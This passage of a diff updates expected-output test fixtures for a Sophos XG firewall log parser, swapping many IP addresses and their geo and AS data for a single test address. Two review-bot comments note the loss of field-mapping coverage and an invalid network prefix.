"action": "warned", 
@@ -3287,29 +3403,31 @@ { "server": { "port": 80, - "ip": "64.233.188.94" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "64.233.188.94" + "ip": "175.16.199.1" }, "source": { "port": 46322, @@ -3350,7 +3468,7 @@ ], "ip": [ "192.168.73.220", - "64.233.188.94" + "175.16.199.1" ] }, "sophos": { 
@@ -3380,8 +3498,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566278600Z", - "original": "device=\"SFW\" date=2016-12-02 time=18:50:22 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050901616006 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.ca/?gfe_rd=cr\u0026ei=ojxHWP3WC4WN8QeRioDABw\" contenttype=\"text/html\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=64.233.188.94 protocol=\"TCP\" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname=\"Search\" reason=\"not eligible\"", + "ingested": "2021-12-09T13:44:55.715172700Z", + "original": "device=\"SFW\" date=2016-12-02 time=18:50:22 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050901616006 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.ca/?gfe_rd=cr\u0026ei=ojxHWP3WC4WN8QeRioDABw\" contenttype=\"text/html\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname=\"Search\" reason=\"not eligible\"", "code": "050901616006", "kind": "event", "action": "allowed", 
@@ -3400,15 +3518,32 @@ "level": "informational" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "user": { "name": "elastic.user@elastic.test.com", "group": { "name": "Open Group" } }, - "ip": "172.17.35.116" + "ip": "175.16.199.1" }, - "message": "User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116", + "message": "User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 175.16.199.1", "tags": [ "preserve_original_event" ], @@ -3430,7 +3565,7 @@ "testhost.local" ], "ip": [ - "172.17.35.116" + "175.16.199.1" ] }, "sophos": { 
@@ -3451,12 +3586,12 @@ "name": "testhost.local" }, "client": { - "ip": "172.17.35.116" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566284100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:57 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062910617701 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"Open Group\" auth_client=\"CTA\" auth_mechanism=\"AD\" reason=\"\" src_ip=172.17.35.116 message=\"User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116\" name=\"elastic.user@elastic.test.com\" src_mac=", + "ingested": "2021-12-09T13:44:55.715179Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:57 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062910617701 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"Open Group\" auth_client=\"CTA\" auth_mechanism=\"AD\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 175.16.199.1\" name=\"elastic.user@elastic.test.com\" src_mac=", "code": "062910617701", "kind": "event", "type": [ 
@@ -3474,54 +3609,55 @@ }, { "server": { - "ip": "214.167.51.66" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 721, + "number": 4837, "organization": { - "name": "DoD Network Information Center" + "name": "CHINA UNICOM China169 Backbone" } }, - "ip": "214.167.51.66" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-28", - "city_name": "Elblag", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Warmia-Masuria", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 19.4195, - "lat": 54.172 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 5617, + "number": 4837, "organization": { - "name": "Orange Polska Spolka Akcyjna" + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "name": "elastic.user@elastic.test.com" }, - "ip": "83.20.132.250" + "ip": "175.16.199.1" }, - "message": "location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)", + "message": "location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)", "tags": [ "preserve_original_event" ], @@ -3543,8 +3679,8 @@ "testhost.local" ], "ip": [ - "83.20.132.250", - "214.167.51.66" + "175.16.199.1", + "175.16.199.1" ] }, "sophos": { @@ -3552,7 +3688,7 @@ "device_name": "XG230", "log_type": "Event", "log_component": "IPSec", - "localnetwork": "172.17.32.0/19", + "localnetwork": "175.16.199.1/19", "log_subtype": "System", "connectionname": "Location-1", "remotenetwork": "10.84.234.5/32", 
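Review bot: With `server.ip`, `destination.ip` and `source.ip` all set to `175.16.199.1` in this hunk, the expected output can no longer catch a swap between the localinterfaceip, remoteinterfaceip and src fields in the pipeline, which the previous fixture with three distinct addresses did. The `related.ip` array in the `@@ -3543,8 +3679,8 @@` hunk on the same line now holds the same address twice (`"175.16.199.1", "175.16.199.1"`), while the `@@ -4775`, `@@ -4949` and `@@ -5082` hunks collapse their lists to a single entry, which looks like inconsistent duplicate handling between the processors that populate related.ip and is worth checking. Using two or three distinct addresses from the supported test range for local interface, remote interface and source keeps the mapping coverage.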
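Review bot: `"localnetwork": "175.16.199.1/19"` in the `@@ -3552,7 +3688,7 @@` hunk replaces an RFC 1918 network prefix (`172.17.32.0/19`) that was not a public address, and the new value is a host address with a /19 mask rather than a network address. The same substitution appears in the raw event as `localnetwork=\"175.16.199.1/19\"` in the following hunk. Restoring `"localnetwork": "172.17.32.0/19"` and the matching value in the `original` string keeps the fixture realistic for anything that later parses the field as a CIDR.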
@@ -3567,12 +3703,12 @@ "name": "testhost.local" }, "client": { - "ip": "83.20.132.250" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566287900Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=214.167.51.66 localgateway=\"\" localnetwork=\"172.17.32.0/19\" remoteinterfaceip=83.20.132.250 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)\"", + "ingested": "2021-12-09T13:44:55.715185Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=175.16.199.1 localgateway=\"\" localnetwork=\"175.16.199.1/19\" remoteinterfaceip=175.16.199.1 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)\"", "code": "062511418055", "kind": "event" } 
@@ -3618,7 +3754,7 @@ }, "event": { "severity": 3, - "ingested": "2021-06-30T11:19:55.566291800Z", + "ingested": "2021-12-09T13:44:55.715209200Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:59 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511318057 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Expire\" priority=Error user_name=\"\" connectionname=\"\" connectiontype=\"0\" localinterfaceip=\"\" localgateway=\"\" localnetwork=\"\" remoteinterfaceip=\"\" remotenetwork=\"\" message=\"IKE_SA timed out before it could be established\"", "code": "062511318057", "kind": "event" @@ -3630,27 +3766,26 @@ }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-20", - "city_name": "Augustów", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Podlasie", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 22.985, - "lat": 53.845 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 5617, + "number": 4837, "organization": { - "name": "Orange Polska Spolka Akcyjna" + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "name": "elastic.user@elastic.test.com" }, - "ip": "83.9.140.96" + "ip": "175.16.199.1" }, "message": "User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism", "tags": [ @@ -3674,7 +3809,7 @@ "testhost.local" ], "ip": [ - "83.9.140.96" + "175.16.199.1" ] }, "sophos": { 
@@ -3694,12 +3829,12 @@ "name": "testhost.local" }, "client": { - "ip": "83.9.140.96" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566295300Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=83.9.140.96 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=", + "ingested": "2021-12-09T13:44:55.715215200Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=", "code": "063210617704", "kind": "event", "type": [ @@ -3757,7 +3892,7 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566300300Z", + "ingested": "2021-12-09T13:44:55.715221700Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:01 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=064011517819 log_type=\"Event\" log_component=\"Anti-Virus\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=1.0.407794 newversion=1.0.407795 message=\"Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.\"", "code": "064011517819", "kind": "event", 
@@ -3812,7 +3947,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566305600Z", + "ingested": "2021-12-09T13:44:55.715277500Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:02 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=063411660022 log_type=\"Event\" log_component=\"DHCP Server\" log_subtype=\"System\" status=\"Expire\" priority=Information ipaddress=\"192.168.110.10\" client_physical_address=\"-\" client_host_name=\"\" message=\"Lease 192.168.110.10 expired\" raw_data=\"192.168.110.10\"", "code": "063411660022", "kind": "event" @@ -3824,27 +3959,26 @@ }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Schleidweiler", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.6593, - "lat": 49.8808 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 3320, + "number": 4837, "organization": { - "name": "Deutsche Telekom AG" + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "name": "elastic.user@elastic.test.com" }, - "ip": "217.250.157.135" + "ip": "175.16.199.1" }, "message": "User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism", "tags": [ @@ -3868,7 +4002,7 @@ "testhost.local" ], "ip": [ - "217.250.157.135" + "175.16.199.1" ] }, "sophos": { 
@@ -3888,12 +4022,12 @@ "name": "testhost.local" }, "client": { - "ip": "217.250.157.135" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566312Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=217.250.157.135 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=", + "ingested": "2021-12-09T13:44:55.715283800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=", "code": "063110617710", "kind": "event", "type": [ 
@@ -3971,7 +4105,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566319400Z", + "ingested": "2021-12-09T13:44:55.715289700Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:04 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062811617824 log_type=\"Event\" log_component=\"SSL VPN\" log_subtype=\"System\" priority=Information Mode=\"Remote Access\" sessionid=\"\" starttime=0 user_name=\"elastic.user@elastic.test.com\" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status=\"Established\" message=\"SSL VPN User 'elastic.user@elastic.test.com' connected \" timestamp=1589960866 connectionname=\"\" remote_ip=10.82.234.12", "code": "062811617824", "kind": "event" @@ -3983,27 +4117,26 @@ }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Fell", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.7833, - "lat": 49.7667 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 31334, + "number": 4837, "organization": { - "name": "Vodafone Kabel Deutschland GmbH" + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "name": "hendrikl" }, - "ip": "91.67.201.4" + "ip": "175.16.199.1" }, "message": "User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials", "tags": [ @@ -4027,7 +4160,7 @@ "testhost.local" ], "ip": [ - "91.67.201.4" + "175.16.199.1" ] }, "sophos": { 
@@ -4048,12 +4181,12 @@ "name": "testhost.local" }, "client": { - "ip": "91.67.201.4" + "ip": "175.16.199.1" }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566326600Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=91.67.201.4 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=", + "ingested": "2021-12-09T13:44:55.715295400Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=175.16.199.1 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=", "code": "063010517708", "kind": "event", "category": [ @@ -4107,7 +4240,7 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566334Z", + "ingested": "2021-12-09T13:44:55.715301300Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:06 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=066911518017 log_type=\"Event\" log_component=\"ATP\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=1.0.0297 newversion=1.0.0298 message=\"ATP definitions upgraded from 1.0.0297 to 1.0.0298.\"", "code": "066911518017", "kind": "event" 
@@ -4169,7 +4302,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566341300Z", + "ingested": "2021-12-09T13:44:55.715307100Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:07 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062009617502 log_type=\"Event\" log_component=\"GUI\" log_subtype=\"Admin\" status=\"Successful\" priority=Information user_name=\"admin\" src_ip=10.83.234.5 syslog_server_name='Logstash' message=\"SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'\"", "code": "062009617502", "kind": "event" @@ -4181,20 +4314,28 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } }, "user": { "name": "root" }, - "ip": "172.66.35.15" + "ip": "175.16.199.1" }, - "message": "User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials", + "message": "User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials", "tags": [ "preserve_original_event" ], @@ -4216,7 +4357,7 @@ "testhost.local" ], "ip": [ - "172.66.35.15" + "175.16.199.1" ] }, "sophos": { 
@@ -4235,12 +4376,12 @@ "name": "testhost.local" }, "client": { - "ip": "172.66.35.15" + "ip": "175.16.199.1" }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566349Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=172.66.35.15 message=\"User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials\"", + "ingested": "2021-12-09T13:44:55.715313Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=175.16.199.1 message=\"User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials\"", "code": "062109517507", "kind": "event", "outcome": "failure" @@ -4288,7 +4429,7 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566356400Z", + "ingested": "2021-12-09T13:44:55.715318800Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:09 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063911517818 log_type=\"Event\" log_component=\"IPS\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=9.17.09 newversion=9.17.10 message=\"IPS definitions upgraded from 9.17.09 to 9.17.10.\"", "code": "063911517818", "kind": "event" 
@@ -4334,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566363700Z", + "ingested": "2021-12-09T13:44:55.715324800Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:10 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063311617923 log_type=\"Event\" log_component=\"Appliance\" log_subtype=\"System\" priority=Information backup_mode='appliance' message=\"Scheduled backup to appliance is successful.\"", "code": "063311617923", "kind": "event" @@ -4409,7 +4550,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566370900Z", + "ingested": "2021-12-09T13:44:55.715330600Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:20 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062910617703 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"VPN.SSL.Users.elastic\" auth_client=\"IPSec\" auth_mechanism=\"N/A\" reason=\"\" src_ip=10.84.234.38 src_mac=\"\" start_time=1591086575 sent_bytes=0 recv_bytes=0 message=\"User elastic.user@elastic.test.com was logged out of firewall\" name=\"elastic.user@elastic.test.com\" timestamp=1591086576", "code": "062910617703", "kind": "event", 
@@ -4484,7 +4625,7 @@ "event": { "duration": 164000000000000, "severity": 6, - "ingested": "2021-06-30T11:19:55.566378200Z", + "ingested": "2021-12-09T13:44:55.715336500Z", "original": "device=\"SFW\" date=2017-03-16 time=12:56:01 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618014 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Connected\" eventtime=\"2017-03-16 12:56:01 IST\" duration=164000 branch_name=Gaurav Patel recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms\"", "code": "066811618014", "kind": "event", @@ -4548,7 +4689,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566385500Z", + "ingested": "2021-12-09T13:44:55.715342400Z", "original": "device=\"SFW\" date=2017-03-16 time=12:53:27 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Disconnected\" eventtime=\"2017-03-16 12:53:27 IST\" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message=\"A350196C47072B0/Gaurav Patel is now disconnected\"", "code": "066811618015", "kind": "event", @@ -4612,7 +4753,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566392800Z", + "ingested": "2021-12-09T13:44:55.715348300Z", "original": "device=\"SFW\" date=2017-03-16 time=12:46:26 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Interim\" eventtime=\"2017-03-16 12:46:26 IST\" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/NY transfered bytes TX: 0 RX: 0\"", "code": "066811618016", "kind": "event", 
@@ -4662,7 +4803,7 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566396100Z", + "ingested": "2021-12-09T13:44:55.715354500Z", "original": "device=\"SFW\" date=2018-06-06 time=11:12:10 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=063711517815 log_type=\"Event\" log_component=\"DDNS\" log_subtype=\"System\" status=\"Success\" priority=Notice host=test1.customtest.dyndns.org updatedip=10.198.232.86 reason=\"\" message=\"DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.\"", "code": "063711517815", "kind": "event" @@ -4676,7 +4817,7 @@ "port": 80, "bytes": 606, "packets": 5, - "ip": "91.228.167.86" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -4686,26 +4827,25 @@ "port": 0 }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SK-BL", - "city_name": "Bratislava", - "country_iso_code": "SK", - "country_name": "Slovakia", - "region_name": "Bratislava", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 17.1078, - "lat": 48.15 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 50881, + "number": 4837, "organization": { - "name": "ESET, spol. s r.o." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 606, - "ip": "91.228.167.86", + "ip": "175.16.199.1", "packets": 5 }, "rule": { 
@@ -4715,26 +4855,28 @@ "source": { "nat": { "port": 0, - "ip": "213.167.51.66" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "RU" + "country_iso_code": "CN" }, "as": { - "number": 8905, + "number": 4837, "organization": { - "name": "Digit One LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 62841, "bytes": 459, - "ip": "172.17.34.15", + "ip": "175.16.199.1", "mac": "00:00:00:00:00:00", "packets": 6 }, @@ -4775,9 +4917,7 @@ "testhost.local" ], "ip": [ - "172.17.34.15", - "91.228.167.86", - "213.167.51.66" + "175.16.199.1" ] }, "sophos": { 
@@ -4816,13 +4956,13 @@ "bytes": 459, "mac": "00:00:00:00:00:00", "packets": 6, - "ip": "172.17.34.15" + "ip": "175.16.199.1" }, "event": { "duration": 11000000000, "severity": 6, - "ingested": "2021-06-30T11:19:55.566401400Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol=\"TCP\" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715400500Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol=\"TCP\" 
